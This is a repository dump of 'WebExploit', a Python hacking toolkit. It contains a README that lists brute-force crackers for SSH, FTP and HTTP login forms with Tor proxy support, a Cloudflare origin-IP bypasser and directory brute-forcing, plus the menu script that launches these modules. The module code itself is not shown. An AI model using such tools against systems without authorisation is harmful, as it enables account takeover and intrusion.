├── README.md ├── VERSION ├── WebExploit.py ├── cores ├── __pycache__ │ ├── ahf.cpython-310.pyc │ ├── aps.cpython-310.pyc │ ├── b64.cpython-310.pyc │ ├── baner.cpython-310.pyc │ ├── cfb.cpython-310.pyc │ ├── cms.cpython-310.pyc │ ├── dirboster.cpython-310.pyc │ ├── fpc.cpython-310.pyc │ ├── ipl.cpython-310.pyc │ ├── mojiana.cpython-310.pyc │ ├── ping.cpython-310.pyc │ ├── rarc.cpython-310.pyc │ ├── ril.cpython-310.pyc │ ├── ssc.cpython-310.pyc │ ├── sse.cpython-310.pyc │ ├── wpf.cpython-310.pyc │ └── zipc.cpython-310.pyc ├── ahf.py ├── aps.py ├── b64.py ├── baner.py ├── cfb.py ├── cms.py ├── default-dirs.txt ├── dirboster.py ├── fpc.py ├── history ├── ipl.py ├── mojiana.py ├── ping.py ├── pnt.py ├── rarc.py ├── ril.py ├── ssc.py ├── sse.py ├── subdomains.txt ├── updater.py ├── wp-plugins.txt ├── wpf.py └── zipc.py ├── examples ├── data_httpGet_example.txt ├── header.json ├── hosts_ForAngryIpScanner.txt ├── ipRange_Example.txt ├── passlist_example.txt └── users.txt ├── files ├── .version └── updateControl.py ├── img ├── APS.jpg ├── Infog_menu.png ├── PasswordCrack.png ├── WebExploit.jpg ├── WebExploitMenu.png ├── eyecrackerMojiana.jpg ├── history └── privateWebHacking.png ├── installer.sh ├── licence └── LICENSE ├── requirements.txt └── setup.py /README.md: -------------------------------------------------------------------------------- 1 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/WebExploit.jpg)](https://github.com/c4ssif3r/WebExploit)‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌ 2 | ![](https://img.shields.io/badge/WebExploit-1.0.0[M\J\I]-red%3E) 3 | ![-----------------------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 4 | [![](https://img.shields.io/static/v1?label=Owner&message=Mji~DarkPwn&color=black)](http://127.0.0.1:9050) 5 | ![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg) 6 | ![-----------------------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 7 | 8 | - [X] __WebExploit:__ 9 | - Vesrion 1.0.0 [MJI] 10 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 11 | 12 | ##### Launch and installing WebExploit 🕸️: 13 | 14 | 1. Clone WebExploit from github: 15 | 16 | - `git clone https://github.com/C4ssif3r/WebExploit/` 17 | 18 | 2. Change directory to WebExploit 19 | 20 | - `cd WebExploit` 21 | 22 | 3. Installin requirements python library: 23 | 24 | + For LINUX: 25 | - `sudo python setup.py install` 26 | 27 | + For TERMUX: 28 | - python setup.py install` 29 | 30 | 4. Launch (run) Web Exploit with python3.x: 31 | 32 | - `python WebExploit.py` 33 | 34 | ### other requirements (for noobs!) 35 | 36 | `apt update -y && apt upgrade -y && apt install python -y && apt install git -y` 37 | 38 | + Install Python Pip (if is not installed!) 39 | 40 | `apt install python-pip` 41 | 42 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 43 | 44 | ###### TESTED ON: 45 | + [X] TERMUX 46 | + [X] KALI LINUX 47 | 48 | **Note ! If u using kali to sure using** `sudo` **when installing requirements!!!** 49 | 50 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 51 | #### preview WebExploit 52 | + ###### WebExploit Main Menu: 53 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/WebExploitMenu.png)]() 54 | ### Features: 55 | + #### Information Gathering: 56 | [ℹ️ Whats Information Gathering?](https://github.com/C4ssif3r/WebExploit/wiki/Information-Gathering) 57 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/Infog_menu.png)]() 58 | + Advanced Port Scanner. [Click for show info & How To Use](https://github.com/C4ssif3r/WebExploit/wiki/Advanced-Port-Scanner-Tool) 59 | + Angry Hash Type Finder [Identifier All Hash Types] [Click For Show Info & How To Use?](https://github.com/C4ssif3r/WebExploit/wiki/Angry-Hash-Finder-(type(identifier))-%F0%9F%98%A1) 60 | + Base 16 32 64 85 Decode & Encode [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder) 61 | + BruteForce Directories [DirBooster] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/DirBooster-%F0%9F%91%BD) 62 | + CloudFlare Bypasser [Get Real IPv4] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/cloudflare-bypasser) 63 | + CMS - Content Management System [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Cms-detector) 64 | + Get Location By ip:v4 (Show On GoggleMap) [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ipl-Ip-to-location!) 65 | + Ping Tool < By External Server > [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ping-tool-by-external-server) 66 | + Reverse Ip Lookup ( Get Sites On A IP ) [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Reverse-ip-lookup-!-Domain-LookUp-:-%3F) 67 | + Shodan Search Engine \+ Save Results [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Sse-shodan-Search-Engine-%F0%9F%94%8D-XD%F0%9F%94%8E) 68 | 69 | + #### Private Web Hacking: 70 | [ℹ️ Whats Priv8 Hacking Tools?](https://github.com/C4ssif3r/WebExploit/wiki/Priv8-Web-Hacking) 71 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/privateWebHacking.png)]() 72 | + BruteForce Directories [DirBooster] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder) 73 | + CloudFlare Bypasser [Get Real IPv4] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/cloudflare-bypasser) 74 | + (EyeCracker)Mojiana ( BruteForce All HTTP Forms ) [angry 😡💢 ! Click For show options and how to use it!?](https://github.com/C4ssif3r/WebExploit/wiki/Mojiana-!) 75 | 76 | | Supoort | MethodRequest | ProxySupportTypes | 77 | | :-------------------- | :--------------------: | --------------------: | 78 | | YES | HTTP(S) POST FORM | TOR, HTTP(S), SOCKS4,5 | 79 | | YES | HTTP(S) GET FORM | TOR, HTTP(S), SOCKS4,5 | 80 | - [X] PROXY SUPPORT 81 | - HTTP(S) 82 | - SOCKS4,5 83 | - TOR ![TOR](https://img.shields.io/badge/tor-%237E4798.svg?style=for-the-badge&logo=tor-project&logoColor=white) 84 | - [X] HEADER SUPPORT 85 | - [X] COOKIE SUPPORT 86 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 87 | 88 | + Reverse Ip Lookup ( Get Sites On A IP ) 89 | 90 | + #### Password Attacks (Crack) 91 | [ℹ️ Whats Password Attacks Tools?](https://github.com/C4ssif3r/WebExploit/wiki/Password-Attacks-Crack!) 92 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/PasswordCrack.png)]() 93 | + Angry Hash Type Finder [Identifier All Hash Types] [Click For Show Info & How To Use?](https://github.com/C4ssif3r/WebExploit/wiki/Angry-Hash-Finder-(type(identifier))-%F0%9F%98%A1) 94 | + Base 16 32 64 85 Decode & Encode [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder) 95 | + FTP Crakcer [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ftp-cracker) 96 | + SSH Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ssh-cracker) 97 | + RAR Password Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Rar-cracker) 98 | + ZIP Password Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Zip-Cracker) 99 | + (EyeCracker)Mojiana ( BruteForce All HTTP(s) Forms ) [angry 😡💢 ! Click For show options and how to use it!?](https://github.com/C4ssif3r/WebExploit/wiki/Mojiana-!) 100 | 101 | | Supoort | MethodRequest | ProxySupportTypes | 102 | | :-------------------- | :--------------------: | --------------------: | 103 | | YES | HTTP(S) POST FORM | TOR, HTTP(S), SOCKS4,5 | 104 | | YES | HTTP(S) GET FORM | TOR, HTTP(S), SOCKS4,5 | 105 | - [X] PROXY SUPPORT 106 | - HTTP(S) 107 | - SOCKS4,5 108 | - TOR ![TOR](https://img.shields.io/badge/tor-%237E4798.svg?style=for-the-badge&logo=tor-project&logoColor=white) 109 | - [X] HEADER SUPPORT 110 | - [X] COOKIE SUPPORT 111 | 112 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 113 | 114 | > EyeCracker Pic: 115 | 116 | [![](https://github.com/C4ssif3r/WebExploit/blob/main/img/eyecrackerMojiana.jpg)](t.me/Zer0x00) 117 | 118 | 119 | ![------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 120 | 121 | 122 | 123 | `.◠.` 124 | 125 | `Please Report Bug's to my telegram:)` 126 | 127 | ![-----------------------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 128 | Report bug 🪲 [![My Telegram](https://img.shields.io/badge/Telegram-100000?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/IranPwner) 129 | 130 | ![-----------------------------------------------------](https://raw.githubusercontent.com/andreasbm/readme/master/assets/lines/rainbow.png) 131 | -------------------------------------------------------------------------------- /VERSION: -------------------------------------------------------------------------------- 1 | 2.0.0 2 | -------------------------------------------------------------------------------- /WebExploit.py: -------------------------------------------------------------------------------- 1 | def WebExploit(): 2 | ''' 3 | 'MjI' 4 | _____________ 5 | MIT License 6 | 7 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 8 | 9 | Permission is hereby granted, free of charge, to any person obtaining a copy 10 | of this software and associated documentation files (the "Software"), to deal 11 | in the Software without restriction, including without limitation the rights 12 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 13 | copies of the Software, and to permit persons to whom the Software is 14 | furnished to do so, subject to the following conditions: 15 | 16 | The above copyright notice and this permission notice shall be included in all 17 | copies or substantial portions of the Software. 18 | 19 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 20 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 21 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 22 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 23 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 24 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 25 | SOFTWARE. 26 | ''' 27 | 28 | 29 | import os,sys 30 | from colorama import Fore as f 31 | import time as t 32 | from treelib import Node, Tree 33 | tree = Tree() 34 | class FlowerNode(Node): 35 | def __init__(self, color): 36 | self.color = color 37 | fnode = FlowerNode("white") 38 | 39 | # baner #bnr 40 | # dirboster #dirboster 41 | # zipc # zip password cracker 42 | # rarc # rar password cracker 43 | # aps #advanced port scanner 44 | # wpf # wordpress plugin finder 45 | # ipl # ip location tool 46 | # ril # reverce ip lookup 47 | # ssc # ssh cracker 48 | # fpc # ftp cracker 49 | # b64 # base 16, 32, 64, 85 tools . enc . dec 50 | # sse # shodan search engine 51 | # cms # content management system detector 52 | # cfb # CloadFlare bypasser 53 | # mojiana # ? 54 | # ping # ping tool 55 | # ahf # angry hash finder 56 | # updater # update WebExploit 57 | from cores import (updater, baner, dirboster, zipc, rarc, aps, wpf, ipl, ril, ssc, fpc, b64, sse, cms, cfb, mojiana, ping, ahf, pnt) 58 | reset = "\033[0m" 59 | red = "\033[0;31m" 60 | class C: 61 | ''' 62 | Define Colors By Manual. 63 | ''' 64 | black = "\033[0;30m" 65 | red = "\033[0;31m" 66 | green = "\033[0;32m" 67 | brown = "\033[0;33m" 68 | blue = "\033[0;34m" 69 | purple = "\033[0;35m" 70 | cyan = "\033[0;36m" 71 | l_gray = "\033[0;37m" 72 | dark_gray = "\033[1;30m" 73 | l_red = "\033[1;31m" 74 | red = "\033[1;31m" 75 | l_green = "\033[1;32m" 76 | green = "\033[1;32m" 77 | yellow = "\033[1;33m" 78 | l_blue = "\033[1;34m" 79 | l_purple = "\033[1;35m" 80 | l_cyan = "\033[1;36m" 81 | l_white = "\033[1;37m" 82 | faint = "\033[2m" 83 | italic = "\033[3m" 84 | underline = "\033[4m" 85 | blink = "\033[5m" 86 | nefative = "\033[7m" 87 | cross = "\033[9m" 88 | ended = "\033[0m" 89 | bold = "\033[1m" 90 | nbold = "\033[0m" 91 | reset = "\033[0m" 92 | white = f.WHITE 93 | global c 94 | c = C 95 | updater.run() 96 | 97 | while True: 98 | bnr = baner.baner() 99 | print (bnr+f.WHITE+".VERSION 2.0.0 \MJ\\"+C.reset+C.bold) 100 | print ('|') 101 | #print(f.WHITE+""+C.reset+C.bold) 102 | class F(object): 103 | def __init__(self, color): 104 | self.color = color 105 | 106 | ftree = Tree() 107 | tree = Tree() 108 | tree1 = Tree() 109 | tree2 = Tree() 110 | tree3 = Tree() 111 | tree.create_node("Web Exploit", "WebExploit") # root 112 | tree.create_node("1- Information Gathering", "info", parent="WebExploit") 113 | #tree.create_node("", "", parent="crack") 114 | # tree.create_node("2- Web Hacking", "WebHacking", parent="WebExploit") 115 | # tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana2", parent="WebHacking") 116 | # tree.create_node("Content Management", "cms12", parent="WebHacking") 117 | tree.create_node("2- Private Web Hacking", "p8web", parent="WebExploit") 118 | tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana3", parent="p8web") 119 | tree.create_node("Brute Force Directories - [Dir Booster]", "dirboster", parent="p8web") 120 | tree.create_node("Cloud Flare Bypass - [Get Real Ip]", "cfb2", parent="p8web") 121 | tree.create_node("3- Password Attacks", "crack", parent="WebExploit") 122 | tree.create_node("Base 16,32,64,85 Encode | Decode", "ba64", parent="crack") 123 | tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana", parent="crack") 124 | tree.create_node("SSH cracker Tool", "sshc", parent="crack") 125 | tree.create_node("FTP cracker Tool", "ftpc", parent="crack") 126 | tree.create_node("ZIP password cracker Tool", "zipC", parent="crack") 127 | tree.create_node("RAR password cracker Tool", "rarC", parent="crack") 128 | tree.create_node("Angry Hash Type Finder - [Identifier]", "aAHF", parent="crack") 129 | tree.create_node("Reverse Ip Lookup - [Get Sites On a IP]", "ril2", parent="p8web") 130 | tree.create_node("Cloud Flare Bypass - [Get Real Ip]", "cfb", parent="info") 131 | tree.create_node("WordPress Plugin Finder", "wpf", parent="info") 132 | tree.create_node("Get Location By Ip v4", "ipl", parent="info") 133 | tree.create_node("Brute Force Directories - [Dir Booster]", "dirbooster", parent="info") 134 | tree.create_node("Advanced Port Scanner", "aps", parent="info") 135 | tree.create_node("Reverse Doamin Lookup - [Get Sites on a IP]", "ril", parent="info") 136 | tree.create_node("Base 16,32,64,85 Tool Enc-Dec", "b64", parent="info") 137 | tree.create_node("Shodan Search Engine + [Save Results]", "sse", parent="info") 138 | tree.create_node("Content Management System Detector", "cms", parent="info") 139 | tree.create_node("Angry Hash Type Finder - [Identifier]", "ahf", parent="info") 140 | tree.create_node("Ping Tool - [By External Server]", "ping", parent="info") 141 | #tree.create_node("Version 1.0.0 \mj\\", "version", parent="WebExploit") 142 | #tree.create_node("", "", parent="info") 143 | # TREE 1 144 | # print ('\n') 145 | tree1.create_node("Information Gathering", "infog") # root info g 146 | tree1.create_node("‌10 -> WordPress Plugin Finder Tool ", "wpf2", parent='infog') 147 | tree1.create_node("0 -> Advanced Port Scanner", "aps2", parent='infog') 148 | tree1.create_node("1 -> Angry Hash Type Finder - [Identifier]", "ang2", parent='infog') 149 | tree1.create_node("2 -> Base 16,32,64,85 Tool Enc-Dec", "bse2", parent='infog') 150 | tree1.create_node("3 -> Brute Force Directories - [Dir Booster]", "db2", parent='infog') 151 | tree1.create_node("4 -> Cloud Flare Bypass - [Get Real Ip]", "clb2", parent='infog') 152 | tree1.create_node("5 -> Content Management System Detector", "cms2", parent='infog') 153 | tree1.create_node("6 -> Get Location By Ip v4 [show on google map]", "ipl2", parent='infog') 154 | tree1.create_node("7 -> Ping Tool - [By External Server]", "ping2", parent='infog') 155 | tree1.create_node("8 -> Reverse Domain Lookup - [Get Sites on a IP]", "rdl2", parent='infog') 156 | tree1.create_node("9 -> Shodan Search Engine + [Save Results]", "sse2", parent='infog') 157 | tree1.create_node("10 -> PhoneNumber To location + [PhoneLocFinder]", "pnt", parent='infog') 158 | # m 159 | 160 | # web attacks 161 | #ftree.show() 162 | # TREE 2 163 | tree2.create_node("Private Web Hacking", "p8_2") # root 164 | tree2.create_node("0 -> Brute Force Directories - [Dir Booster]", "bfd2", parent='p8_2') 165 | tree2.create_node("1 -> Cloud Flare Bypass - [Get Real Ip]", "cfb2", parent='p8_2') 166 | tree2.create_node("2 -> Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]] 4y", "mjiari2", parent='p8_2') 167 | tree2.create_node("3 -> Reverse Ip Lookup - [Get Sites On a IPv4]", "ril3", parent='p8_2') 168 | # TREE 3 169 | tree3.create_node("Crack And Password Attacks", "cpa") # root 170 | tree3.create_node("0 -> Angry Hash Type Finder - [Identifier]", "ag2", parent='cpa') 171 | tree3.create_node("1 -> Base 16,32,64,85 Encode | Decode", "b_all", parent='cpa') 172 | tree3.create_node("2 -> FTP cracker Tool", "ftp2", parent='cpa') 173 | tree3.create_node("3 -> Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mjiari3", parent='cpa') 174 | tree3.create_node("4 -> RAR password cracker Tool", "rar2", parent='cpa') 175 | tree3.create_node("5 -> SSH cracker Tool", "ssh2", parent='cpa') 176 | tree3.create_node("6 -> ZIP password cracker Tool", "zip2", parent='cpa') 177 | 178 | print('.MJi') 179 | print('|') 180 | tree.show() 181 | # try: 182 | 183 | while True: 184 | try: 185 | method:str = input(f'.{C.italic}/Mji/WebExploit:~# {C.bold}{C.green}') 186 | break 187 | 188 | except: 189 | print ('please enter a valid value !') 190 | continue 191 | if method == 1 or '1' in method: 192 | 193 | try: 194 | while True: 195 | os.system('clear') 196 | print (bnr) 197 | print(f.WHITE+""+reset) 198 | tree1.show() 199 | mj = input(f'.{C.italic}/Mji/WebExploit/Information-Gathering{C.reset}:~# {C.bold}{C.green}') 200 | if mj: 201 | if mj == '0': 202 | print (f'{c.reset}') 203 | aps.run() 204 | input('press enter for back to menu and press CTRL+C for exit') 205 | 206 | if mj == '1': 207 | print (f'{c.reset}') 208 | ahf.run() 209 | input('press enter for back to menu and press CTRL+C for exit') 210 | 211 | if mj == '2': 212 | print (f'{c.reset}') 213 | b64.run() 214 | input('press enter for back to menu and press CTRL+C for exit') 215 | 216 | if mj == '3': 217 | print (f'{c.reset}') 218 | 219 | dirboster.run() 220 | input('press enter for back to menu and press CTRL+C for exit') 221 | 222 | if mj == '4': 223 | print (f'{c.reset}') 224 | cfb.run() 225 | input('press enter for back to menu and press CTRL+C for exit') 226 | 227 | if mj == '5': 228 | print (f'{c.reset}') 229 | cms.run() 230 | input('press enter for back to menu and press CTRL+C for exit') 231 | 232 | if mj == '6': 233 | print (f'{c.reset}') 234 | ipl.run() 235 | input('press enter for back to menu and press CTRL+C for exit') 236 | 237 | if mj == '7': 238 | print (f'{c.reset}') 239 | ping.run() 240 | input('press enter for back to menu and press CTRL+C for exit') 241 | 242 | if mj == '8': 243 | print (f'{c.reset}') 244 | ril.run() 245 | input('press enter for back to menu and press CTRL+C for exit') 246 | 247 | if mj == '9': 248 | print(f'{c.reset}') 249 | sse.run() 250 | input('press enter for back to menu and press CTRL+C for exit') 251 | 252 | if mj == '10': 253 | print(f'{c.reset}') 254 | wpf.run() 255 | input ("press enter for back to menu and press CTRL+C for exit") 256 | if mj == '11': 257 | print(f'{c.reset}') 258 | pnt.run() 259 | input ("press enter for back to menu and press CTRL+C for exit") 260 | else: 261 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 262 | continue 263 | else: 264 | # input("press enter for back to menu") 265 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 266 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower() 267 | if 'y' in cmd: 268 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 269 | break 270 | sys.exit(0) 271 | # else: 272 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]') 273 | # continue 274 | except Exception as derr: 275 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye! {derr}') 276 | sys.exit(0) 277 | 278 | 279 | if method == 2 or '2' in method: 280 | try: 281 | while True: 282 | os.system('clear') 283 | print (bnr) 284 | print(f.WHITE+""+reset) 285 | tree2.show() 286 | mj = input(f'.{C.italic}/Mji/WebExploit/Private Web Hacking{C.reset}:~# {C.bold}{C.green}') 287 | if mj: 288 | if mj == '0': 289 | print (f'{c.reset}') 290 | dirboster.run() 291 | input('press enter for back to menu and press CTRL+C for exit') 292 | 293 | elif mj == '1': 294 | print (f'{c.reset}') 295 | cfb.run() 296 | input('press enter for back to menu and press CTRL+C for exit') 297 | 298 | elif mj == '2': 299 | print (f'{c.reset}') 300 | mojiana.run() 301 | input('press enter for back to menu and press CTRL+C for exit') 302 | 303 | elif mj == '3': 304 | print (f'{c.reset}') 305 | ril.run() 306 | # input('press enter for back to menu and press CTRL+C for exit') 307 | else: 308 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 309 | continue 310 | else: 311 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 312 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower() 313 | if 'y' in cmd: 314 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 315 | sys.exit(0) 316 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]') 317 | # continue 318 | except: 319 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 320 | sys.exit(0) 321 | # TREE 3 322 | if method == 3 or '3' in method: 323 | 324 | try: 325 | while True: 326 | os.system('clear') 327 | print (bnr) 328 | print(f.WHITE+""+reset) 329 | tree3.show() 330 | mj = input(f'.{C.italic}/Mji/WebExploit/PasswordAttack-Crack{C.reset}:~# {C.bold}{C.green}') 331 | if mj: 332 | if mj == '0': 333 | print (f'{c.reset}') 334 | ahf.run() 335 | input('press enter for back to menu and press CTRL+C for exit') 336 | 337 | if mj == '1': 338 | print (f'{c.reset}') 339 | b64.run() 340 | input('press enter for back to menu and press CTRL+C for exit') 341 | 342 | if mj == '2': 343 | print (f'{c.reset}') 344 | fpc.run() 345 | input('press enter for back to menu and press CTRL+C for exit') 346 | 347 | if mj == '3': 348 | print (f'{c.reset}') 349 | mojiana.run() 350 | input('press enter for back to menu and press CTRL+C for exit') 351 | 352 | if mj == '4': 353 | print (f'{c.reset}') 354 | rarc.run() 355 | input('press enter for back to menu and press CTRL+C for exit') 356 | 357 | if mj == '5': 358 | print (f'{c.reset}') 359 | ssc.run() 360 | input('press enter for back to menu and press CTRL+C for exit') 361 | 362 | if mj == '6': 363 | print (f'{c.reset}') 364 | zipc.run() 365 | input('press enter for back to menu and press CTRL+C for exit') 366 | 367 | 368 | else: 369 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 370 | continue 371 | else: 372 | input("press enter for back to menu") 373 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 374 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower() 375 | if 'y' in cmd: 376 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 377 | sys.exit(0) 378 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]') 379 | # continue 380 | except: 381 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 382 | sys.exit(0) 383 | # if method == 4 or '4' in method: 384 | # 385 | # try: 386 | # while True: 387 | # os.system('clear') 388 | # print (bnr) 389 | # print(f.WHITE+""+reset) 390 | # 391 | # tree1.show() 392 | # mj = input(f'.{C.italic}/Mji/WebExploit/Information-Gathering{C.reset}:~# {C.bold}{C.green}') 393 | # if mj: 394 | # if mj == '0': 395 | # print (f'{c.reset}') 396 | # aps.run() 397 | # input('press enter for back to menu and press CTRL+C for exit') 398 | # 399 | # if mj == '1': 400 | # print (f'{c.reset}') 401 | # ahf.run() 402 | # input('press enter for back to menu and press CTRL+C for exit') 403 | # break 404 | # if mj == '2': 405 | # print (f'{c.reset}') 406 | # b64.run() 407 | # input('press enter for back to menu and press CTRL+C for exit') 408 | # break 409 | # if mj == '3': 410 | # print (f'{c.reset}') 411 | # dirboster.run() 412 | # input('press enter for back to menu and press CTRL+C for exit') 413 | # break 414 | # if mj == '4': 415 | # print (f'{c.reset}') 416 | # cfb.run() 417 | # input('press enter for back to menu and press CTRL+C for exit') 418 | # break 419 | # if mj == '5': 420 | # print (f'{c.reset}') 421 | # cms.run() 422 | # input('press enter for back to menu and press CTRL+C for exit') 423 | # break 424 | # if mj == '6': 425 | # print (f'{c.reset}') 426 | # ipl.run() 427 | # input('press enter for back to menu and press CTRL+C for exit') 428 | # break 429 | # if mj == '7': 430 | # print (f'{c.reset}') 431 | # ping.run() 432 | # input('press enter for back to menu and press CTRL+C for exit') 433 | # break 434 | # if mj == '8': 435 | # print (f'{c.reset}') 436 | # ril.run() 437 | # input('press enter for back to menu and press CTRL+C for exit') 438 | # break 439 | # if mj == '9': 440 | # print (f'{c.reset}') 441 | # sse.run() 442 | # input('press enter for back to menu and press CTRL+C for exit') 443 | # break 444 | # 445 | # else: 446 | # input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 447 | # continue 448 | # else: 449 | 450 | # # print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !') 451 | # # cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower() 452 | # # if 'y' in cmd: 453 | # # print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 454 | # # sys.exit(0) 455 | # # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]') 456 | # # continue 457 | # except: 458 | # print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!') 459 | # sys.exit(0) 460 | else: 461 | # input('\nerror\nBYE!\n') 462 | # os.system('clear') 463 | # break 464 | pass 465 | # except KeyboardInterrupt: 466 | # input(f'\nWebExploit -> Invalid Command \nBYE! ') 467 | # break 468 | 469 | WebExploit() 470 | 471 | -------------------------------------------------------------------------------- /cores/__pycache__/ahf.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ahf.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/aps.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/aps.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/b64.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/b64.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/baner.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/baner.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/cfb.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/cfb.cpython-310.pyc -------------------------------------------------------------------------------- /cores/__pycache__/cms.cpython-310.pyc: 